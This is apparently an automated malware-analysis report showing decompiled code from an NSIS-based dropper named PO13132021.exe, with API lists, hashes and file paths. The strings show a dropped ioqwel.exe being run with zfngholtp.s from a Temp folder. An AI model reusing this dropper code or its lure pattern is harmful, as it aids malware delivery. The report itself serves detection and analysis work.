									}
								}
								_t96 = _v8;
								 *0x424804 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E004042CE(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x420d40 == _t158) {
									E00404697();
								}
								 *0x420d40 = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x420d50;
							_v60 = E00404A8F;
							_v56 = _t146;
							_v68 = E004062BB(_t146, 0x420d50, _t166, 0x420128, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E00405BC0(_t146);
								_t125 =  *((intOrPtr*)( *0x424754 + 0x11c));
								if( *((intOrPtr*)( *0x424754 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
									E004062BB(_t146, 0x420d50, _t166, 0, _t125);
									if(lstrcmpiA(0x4236e0, 0x420d50) != 0) {
										lstrcatA(_t146, 0x4236e0);
									}
								}
								 *0x420d40 =  *0x420d40 + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405C2D(_t146) != 0 && E00405C59(_t146) == 0) {
						E00405BC0(_t146);
					}
					 *0x423f18 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E004042AC(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E004042AC(_t166);
					E004042E1(_t165);
					_t138 = E00406631(8);
					if(_t138 == 0) {
						L53:
						return E00404313(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}

0x0040473e
0x00404744
0x0040474a
0x00404757
0x00404765
0x00404768
0x00404770
0x00404776
0x00404776
0x00404782
0x00404785
0x004047f3
0x004047fa
0x004048d1
0x004048d8
0x004048e7
0x004048e7
0x004048eb
0x004048f5
0x00404902
0x00404904
0x00404904
0x00404912
0x00404919
0x00404920
0x00404923
0x0040495a
0x0040495c
0x00404962
0x00404967
0x0040496b
0x0040496d
0x0040496d
0x00404989
0x00000000
0x0040498b
0x0040498e
0x0040499c
0x004049a2
0x004049a3
0x004049a6
0x004049a9
0x00000000
0x004049a9
0x00404925
0x00404927
0x0040492b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040492d
0x0040492d
0x0040493a
0x0040493f
0x00000000
0x00000000
0x00404943
0x00404945
0x00404945
0x0040494d
0x0040494f
0x00404952
0x00404955
0x00404958
0x00000000
0x00000000
0x00000000
0x00000000
0x00404958
0x004049b5
0x004049bf
0x004049c2
0x004049c5
0x004049cc
0x004049cc
0x004049ce
0x004049ce
0x004049d3
0x004049d5
0x004049dd
0x004049e4
0x004049e6
0x004049f1
0x004049f1
0x004049e6
0x004049f8
0x00404a01
0x00404a0b
0x00404a13
0x00404a2e
0x00404a15
0x00404a1e
0x00404a1e
0x00404a13
0x00404a33
0x00404a38
0x00404a3d
0x00404a46
0x00404a46
0x00404a4f
0x00404a51
0x00404a51
0x00404a5d
0x00404a65
0x00404a6f
0x00404a6f
0x00404a74
0x00000000
0x00404a74
0x00404923
0x004048da
0x004048e1
0x00000000
0x00000000
0x00000000
0x004048e1
0x00404800
0x00404809
0x00404823
0x00404828
0x00404832
0x00404839
0x00404845
0x00404848
0x0040484b
0x00404852
0x0040485a
0x0040485d
0x00404861
0x00404868
0x00404870
0x004048ca
0x00404872
0x00404873
0x0040487a
0x00404884
0x0040488c
0x00404899
0x004048ad
0x004048b1
0x004048b1
0x004048ad
0x004048b6
0x004048c3
0x004048c3
0x00404870
0x00000000
0x00404828
0x00404816
0x00000000
0x00000000
0x0040481c
0x00000000
0x00404787
0x00404794
0x0040479d
0x004047aa
0x004047aa
0x004047b1
0x004047b7
0x004047c0
0x004047c3
0x004047c6
0x004047ce
0x004047d1
0x004047d4
0x004047da
0x004047e1
0x004047e8
0x00404a7a
0x00404a8c
0x004047ee
0x004047f1
0x00000000
0x004047f1
0x004047e8

APIs

GetDlgItem.USER32 ref: 0040478D
SetWindowTextA.USER32(00000000,?), ref: 004047B7
SHBrowseForFolderA.SHELL32(?,00420128,?), ref: 00404868
CoTaskMemFree.OLE32(00000000), ref: 00404873
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s,00420D50,00000000,?,?), ref: 004048A5
lstrcatA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s), ref: 004048B1
SetDlgItemTextA.USER32 ref: 004048C3

Part of subcall function 00405928: GetDlgItemTextA.USER32 ref: 0040593B

Part of subcall function 00406503: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PO13132021.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040655B
Part of subcall function 00406503: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406568
Part of subcall function 00406503: CharNextA.USER32(?,"C:\Users\user\Desktop\PO13132021.exe" ,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040656D
Part of subcall function 00406503: CharPrevA.USER32(?,?,74B5FA90,C:\Users\user\AppData\Local\Temp\,00000000,0040343C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 0040657D

GetDiskFreeSpaceA.KERNEL32(0041FD20,?,?,0000040F,?,0041FD20,0041FD20,?,00000001,0041FD20,?,?,000003FB,?), ref: 00404981
MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040499C

Part of subcall function 00404AF5: lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
Part of subcall function 00404AF5: wsprintfA.USER32 ref: 00404B9B
Part of subcall function 00404AF5: SetDlgItemTextA.USER32 ref: 00404BAE

Strings

C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s, xrefs: 0040489F, 004048A4, 004048AF
A, xrefs: 00404861
PB, xrefs: 0040483B
C:\Users\user\AppData\Local\Temp, xrefs: 0040488E

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\Nla\ioqwel.exe C:\Users\user\AppData\Local\Temp\Nla\zfngholtp.s$PB
API String ID: 2624150263-959554996
Opcode ID: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
Instruction ID: 829ad80b7ad659a1b6830b16dd2e7c43b5ac75723c1b4fdd6e47fb9b3f087a68
Opcode Fuzzy Hash: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
Instruction Fuzzy Hash: 48A18FB1A00209ABDB11EFA5DD45AAF7BB8EF84314F10843BF601B62D1D77C99418B6D

Uniqueness

Uniqueness Score: -1.00%

Function 004059F0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 159
filestringCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E004059F0(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				void* _v12;
				signed int _v16;
				struct _WIN32_FIND_DATAA _v336;
				signed int _t40;
				char* _t53;
				signed int _t55;
				signed int _t58;
				signed int _t64;
				signed int _t66;
				void* _t68;
				signed char _t69;
				CHAR* _t71;
				void* _t72;
				CHAR* _t73;
				char* _t76;

				_t69 = _a8;
				_t73 = _a4;
				_v8 = _t69 & 0x00000004;
				_t40 = E00405CAE(__eflags, _t73);
				_v16 = _t40;
				if((_t69 & 0x00000008) != 0) {
					_t66 = DeleteFileA(_t73);
					asm("sbb eax, eax");
					_t68 =  ~_t66 + 1;
					 *0x4247e8 =  *0x4247e8 + _t68;
					return _t68;
				}
				_a4 = _t69;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406228(0x421d58, _t73);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C07(_t73);
					} else {
						lstrcatA(0x421d58, "\*.*");
					}
					__eflags =  *_t73;
					if( *_t73 != 0) {
						L10:
						lstrcatA(_t73, 0x40a014);
						L11:
						_t71 =  &(_t73[lstrlenA(_t73)]);
						_t40 = FindFirstFileA(0x421d58,  &_v336);
						__eflags = _t40 - 0xffffffff;
						_v12 = _t40;
						if(_t40 == 0xffffffff) {
							L29:
							__eflags = _a4;
							if(_a4 != 0) {
								_t32 = _t71 - 1;
								 *_t32 =  *(_t71 - 1) & 0x00000000;
								__eflags =  *_t32;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t76 =  &(_v336.cFileName);
							_t53 = E00405BEB( &(_v336.cFileName), 0x3f);
							__eflags =  *_t53;
							if( *_t53 != 0) {
								__eflags = _v336.cAlternateFileName;
								if(_v336.cAlternateFileName != 0) {
									_t76 =  &(_v336.cAlternateFileName);
								}
							}
							__eflags =  *_t76 - 0x2e;
							if( *_t76 != 0x2e) {
								L19:
								E00406228(_t71, _t76);
								__eflags = _v336.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t55 = E004059A8(__eflags, _t73, _v8);
									__eflags = _t55;
									if(_t55 != 0) {
										E0040534F(0xfffffff2, _t73);
									} else {
										__eflags = _v8 - _t55;
										if(_v8 == _t55) {
											 *0x4247e8 =  *0x4247e8 + 1;
										} else {
											E0040534F(0xfffffff1, _t73);
											E00406007(_t72, _t73, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004059F0(__eflags, _t73, _a8);
									}
								}
								goto L27;
							}
							_t64 =  *((intOrPtr*)(_t76 + 1));
							__eflags = _t64;
							if(_t64 == 0) {
								goto L27;
							}
							__eflags = _t64 - 0x2e;
							if(_t64 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t76 + 2));
							if( *((char*)(_t76 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t58 = FindNextFileA(_v12,  &_v336);
							__eflags = _t58;
						} while (_t58 != 0);
						_t40 = FindClose(_v12);
						goto L29;
					}
					__eflags =  *0x421d58 - 0x5c;
					if( *0x421d58 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t40;
					if(_t40 == 0) {
						L31:
						__eflags = _a4;
						if(_a4 == 0) {
							L39:
							return _t40;
						}
						__eflags = _v16;
						if(_v16 != 0) {
							_t40 = E0040659C(_t73);
							__eflags = _t40;
							if(_t40 == 0) {
								goto L39;
							}
							E00405BC0(_t73);
							_t40 = E004059A8(__eflags, _t73, _v8 | 0x00000001);
							__eflags = _t40;
							if(_t40 != 0) {
								return E0040534F(0xffffffe5, _t73);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L33;
							}
							E0040534F(0xfffffff1, _t73);
							return E00406007(_t72, _t73, 0);
						}
						L33:
						 *0x4247e8 =  *0x4247e8 + 1;
						return _t40;
					}
					__eflags = _t69 & 0x00000002;
					if((_t69 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x004059fa
0x004059ff
0x00405a08
0x00405a0b
0x00405a13
0x00405a16
0x00405a19
0x00405a21
0x00405a23
0x00405a24
0x00000000
0x00405a24
0x00405a2f
0x00405a32
0x00405a32
0x00405a32
0x00405a36
0x00405a49
0x00405a50
0x00405a55
0x00405a59
0x00405a69
0x00405a5b
0x00405a61
0x00405a61
0x00405a6e
0x00405a71
0x00405a7c
0x00405a82
0x00405a87
0x00405a97
0x00405a99
0x00405a9f
0x00405aa2
0x00405aa5
0x00405b5d
0x00405b5d
0x00405b61
0x00405b63
0x00405b63
0x00405b63
0x00405b63
0x00000000
0x00000000
0x00000000
0x00000000
0x00405aab
0x00405aab
0x00405ab4
0x00405aba
0x00405abf
0x00405ac2
0x00405ac4
0x00405ac8
0x00405aca
0x00405aca
0x00405ac8
0x00405acd
0x00405ad0
0x00405ae3
0x00405ae5
0x00405aea
0x00405af1
0x00405b0c
0x00405b11
0x00405b13
0x00405b37
0x00405b15
0x00405b15
0x00405b18
0x00405b2c
0x00405b1a
0x00405b1d
0x00405b25
0x00405b25
0x00405b18
0x00405af3
0x00405af9
0x00405afb
0x00405b01
0x00405b01
0x00405afb
0x00000000
0x00405af1
0x00405ad2
0x00405ad5
0x00405ad7
0x00000000
0x00000000
0x00405ad9
0x00405adb
0x00000000
0x00000000
0x00405add
0x00405ae1
0x00000000
0x00000000
0x00000000
0x00405b3c
0x00405b46
0x00405b4c
0x00405b4c
0x00405b57
0x00000000
0x00405b57
0x00405a73
0x00405a7a
0x00000000
0x00000000
0x00000000
0x00405a38
0x00405a38
0x00405a3a
0x00405b67
0x00405b69
0x00405b6c
0x00405bbd
0x00405bbd
0x00405bbd
0x00405b6e
0x00405b71
0x00405b7c
0x00405b81
0x00405b83
0x00000000
0x00000000
0x00405b86
0x00405b92
0x00405b97
0x00405b99
0x00000000
0x00405bb4
0x00405b9b
0x00405b9e
0x00000000
0x00000000
0x00405ba3
0x00000000
0x00405baa
0x00405b73
0x00405b73
0x00000000
0x00405b73
0x00405a40
0x00405a43
0x00000000
0x00000000
0x00000000
0x00405a43

APIs

DeleteFileA.KERNEL32(?,?,74B5FA90,74B5F560,00000000), ref: 00405A19
lstrcatA.KERNEL32(00421D58,\*.*,00421D58,?,?,74B5FA90,74B5F560,00000000), ref: 00405A61
lstrcatA.KERNEL32(?,0040A014,?,00421D58,?,?,74B5FA90,74B5F560,00000000), ref: 00405A82
lstrlenA.KERNEL32(?,?,0040A014,?,00421D58,?,?,74B5FA90,74B5F560,00000000), ref: 00405A88
FindFirstFileA.KERNEL32(00421D58,?,?,?,0040A014,?,00421D58,?,?,74B5FA90,74B5F560,00000000), ref: 00405A99
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B46
FindClose.KERNEL32(00000000), ref: 00405B57

Strings

"C:\Users\user\Desktop\PO13132021.exe" , xrefs: 004059F0
\*.*, xrefs: 00405A5B

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\PO13132021.exe" $\*.*
API String ID: 2035342205-2564242415
Opcode ID: e0a9e3feedf786db3519a046742172e8048bcfaf00ecfdfd1d80b1414f5b56fa
Instruction ID: f9fcd54ed45cecb295d84a7a00b3a90cccdf7efad1d91ba0bada197ffcbf79f0
Opcode Fuzzy Hash: e0a9e3feedf786db3519a046742172e8048bcfaf00ecfdfd1d80b1414f5b56fa
Instruction Fuzzy Hash: 0851C430900A44AADB21AB658C85BBF7A78DF42714F14417FF851711D2C77C7A82DE69

Uniqueness

Uniqueness Score: -1.00%

Function 0040216B, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139
comCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E0040216B(void* __eflags) {
				signed int _t55;
				void* _t59;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr* _t84;
				int _t87;
				intOrPtr* _t95;
				signed int _t105;
				signed int _t109;
				void* _t111;

				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
				_t55 =  *(_t111 - 0x18);
				 *(_t111 - 0x90) = _t55 & 0x00000fff;
				_t105 = _t55 & 0x00008000;
				_t109 = _t55 >> 0x0000000c & 0x00000007;
				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
				if(E00405C2D( *(_t111 - 0xc)) == 0) {
					E00402BCE(0x21);
				}
				_t59 = _t111 + 8;
				__imp__CoCreateInstance(0x408418, _t87, 1, 0x408408, _t59);
				if(_t59 < _t87) {
					L15:
					 *((intOrPtr*)(_t111 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t63 =  *((intOrPtr*)(_t111 + 8));
					_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x408428, _t111 - 0x30);
					 *((intOrPtr*)(_t111 - 8)) = _t64;
					if(_t64 >= _t87) {
						_t67 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t67 + 0x50))(_t67,  *(_t111 - 0xc));
						if(_t105 == _t87) {
							_t84 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t84 + 0x24))(_t84, "C:\\Users\\hardz\\AppData\\Local\\Temp\\Nla");
						}
						if(_t109 != _t87) {
							_t82 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t82 + 0x3c))(_t82, _t109);
						}
						_t69 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t69 + 0x34))(_t69,  *(_t111 - 0x74));
						_t95 =  *((intOrPtr*)(_t111 - 0x34));
						if( *_t95 != _t87) {
							_t80 =  *((intOrPtr*)(_t111 + 8));
							 *((intOrPtr*)( *_t80 + 0x44))(_t80, _t95,  *(_t111 - 0x90));
						}
						_t71 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t71 + 0x2c))(_t71,  *((intOrPtr*)(_t111 - 0x88)));
						_t73 =  *((intOrPtr*)(_t111 + 8));
						 *((intOrPtr*)( *_t73 + 0x1c))(_t73,  *((intOrPtr*)(_t111 - 0x78)));
						if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
							 *((intOrPtr*)(_t111 - 8)) = 0x80004005;
							if(MultiByteToWideChar(_t87, _t87,  *(_t111 - 0x38), 0xffffffff,  *(_t111 - 0xc), 0x400) != 0) {
								_t78 =  *((intOrPtr*)(_t111 - 0x30));
								 *((intOrPtr*)(_t111 - 8)) =  *((intOrPtr*)( *_t78 + 0x18))(_t78,  *(_t111 - 0xc), 1);
							}
						}
						_t75 =  *((intOrPtr*)(_t111 - 0x30));
						 *((intOrPtr*)( *_t75 + 8))(_t75);
					}
					_t65 =  *((intOrPtr*)(_t111 + 8));
					 *((intOrPtr*)( *_t65 + 8))(_t65);
					if( *((intOrPtr*)(_t111 - 8)) >= _t87) {
						_push(0xfffffff4);
					} else {
						goto L15;
					}
				}
				E00401423();
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t111 - 4));
				return 0;
			}

0x00402174
0x0040217e
0x00402188
0x00402195
0x004021a0
0x004021a3
0x004021bd
0x004021c3
0x004021c9
0x004021cc
0x004021d6
0x004021da
0x004021da
0x004021df
0x004021f0
0x004021f8
0x004022d4
0x004022d4
0x004022db
0x004021fe
0x004021fe
0x0040220d
0x00402211
0x00402214
0x0040221a
0x00402228
0x0040222b
0x0040222d
0x00402238
0x00402238
0x0040223d
0x0040223f
0x00402246
0x00402246
0x00402249
0x00402252
0x00402255
0x0040225a
0x0040225c
0x00402269
0x00402269
0x0040226c
0x00402278
0x0040227b
0x00402284
0x0040228a
0x00402291
0x004022aa
0x004022ac
0x004022ba
0x004022ba
0x004022aa
0x004022bd
0x004022c3
0x004022c3
0x004022c6
0x004022cc
0x004022d2
0x004022e7
0x00000000
0x00000000
0x00000000
0x004022d2
0x004022dd
0x00402a5d
0x00402a69

APIs

CoCreateInstance.OLE32(00408418,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408408,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2

Strings

C:\Users\user\AppData\Local\Temp\Nla, xrefs: 00402230

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID: C:\Users\user\AppData\Local\Temp\Nla
API String ID: 123533781-3135092921
Opcode ID: f26c3f8f6ad4390839e13d278e0de266c46056394c3b9da9cbcc38a07b5ad247
Instruction ID: 849b10897e6abda320580ec11bca4de19dcbd678575eb1056a8185fe26502568
Opcode Fuzzy Hash: f26c3f8f6ad4390839e13d278e0de266c46056394c3b9da9cbcc38a07b5ad247
Instruction Fuzzy Hash: BC510671A00208AFCB00DFE4C988A9D7BB6EF48314F2045BAF515EB2D1DA799981CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0040659C, Relevance: 3.0, APIs: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040659C(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x4225a0);
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x4225a0;
			}

0x004065a7
0x004065b0
0x00000000
0x004065bd
0x004065b3
0x00000000

APIs

FindFirstFileA.KERNEL32(74B5FA90,004225A0,00422158,00405CF1,00422158,00422158,00000000,00422158,00422158,74B5FA90,?,74B5F560,00405A10,?,74B5FA90,74B5F560), ref: 004065A7
FindClose.KERNEL32(00000000), ref: 004065B3

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
Instruction ID: f69e928bf0ac745f57f8f0961b1e49234d8ba52852923c3f30ba08d6865e50e3
Opcode Fuzzy Hash: a8a8e6ca181c7703a692eace486e77433675a7c42b8a8fe2eb47bb99df7a0189
Instruction Fuzzy Hash: 64D01231615130FBC3411B38BE0C84B7A5C9F093303619B36F466F12E4D7748D62869C

Uniqueness

Uniqueness Score: -1.00%

Function 004027A1, Relevance: 1.5, APIs: 1, Instructions: 29
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E004027A1(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E00402BCE(2), _t19 - 0x1d0) != 0xffffffff) {
					E00406186(__edi, _t6);
					_push(_t19 - 0x1a4);
					_push(__esi);
					E00406228();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}

0x004027b9
0x004027cd
0x004027d8
0x004027d9
0x00402918
0x004027bb
0x004027bb
0x004027bd
0x004027bf
0x004027bf
0x00402a5d
0x00402a69

APIs

FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B0

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: d9853b3f7f72fdecc8c24efd0171727e5bc8c12da0f04fb4769dd8d1300cf035
Instruction ID: a7d85d328faede53e6a1e3b4f28690110558ed3aa0613785cbf8ce06a9006afe
Opcode Fuzzy Hash: d9853b3f7f72fdecc8c24efd0171727e5bc8c12da0f04fb4769dd8d1300cf035
Instruction Fuzzy Hash: 35F0A771704111EED710EB649A49AEEB7A8DF51314F20067FF112B60C1D7B88946972A

Uniqueness

Uniqueness Score: -1.00%

Function 00404CB1, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 491
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404CB1(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t203;
				intOrPtr _t206;
				intOrPtr _t207;
				long _t212;
				signed int _t216;
				signed int _t227;
				void* _t230;
				void* _t231;
				int _t237;
				long _t242;
				long _t243;
				signed int _t244;
				signed int _t250;
				signed int _t252;
				signed char _t253;
				signed char _t259;
				void* _t264;
				void* _t266;
				signed char* _t284;
				signed char _t285;
				long _t290;
				signed int _t300;
				signed int _t308;
				signed char* _t316;
				int _t320;
				int _t321;
				signed int* _t322;
				int _t323;
				long _t324;
				signed int _t325;
				long _t327;
				int _t328;
				signed int _t329;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_v8 = GetDlgItem(_a4, 0x408);
				_t331 = SendMessageA;
				_v24 =  *0x424788;
				_v28 =  *0x424754 + 0x94;
				_t320 = 0x10;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t298 = _a16;
					} else {
						_a12 = 0;
						_t298 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t298;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t298 + 4)) == 0x408) {
							if(( *0x42475d & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t242 = _v16;
									if( *((intOrPtr*)(_t242 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, 0,  *(_t242 + 0x5c));
									}
									_t243 = _v16;
									if( *((intOrPtr*)(_t243 + 8)) == 0xfffffe6a) {
										_t298 = _v24;
										_t244 =  *(_t243 + 0x5c);
										if( *((intOrPtr*)(_t243 + 0xc)) != 2) {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) & 0xffffffdf;
										} else {
											 *(_t244 * 0x418 + _t298 + 8) =  *(_t244 * 0x418 + _t298 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
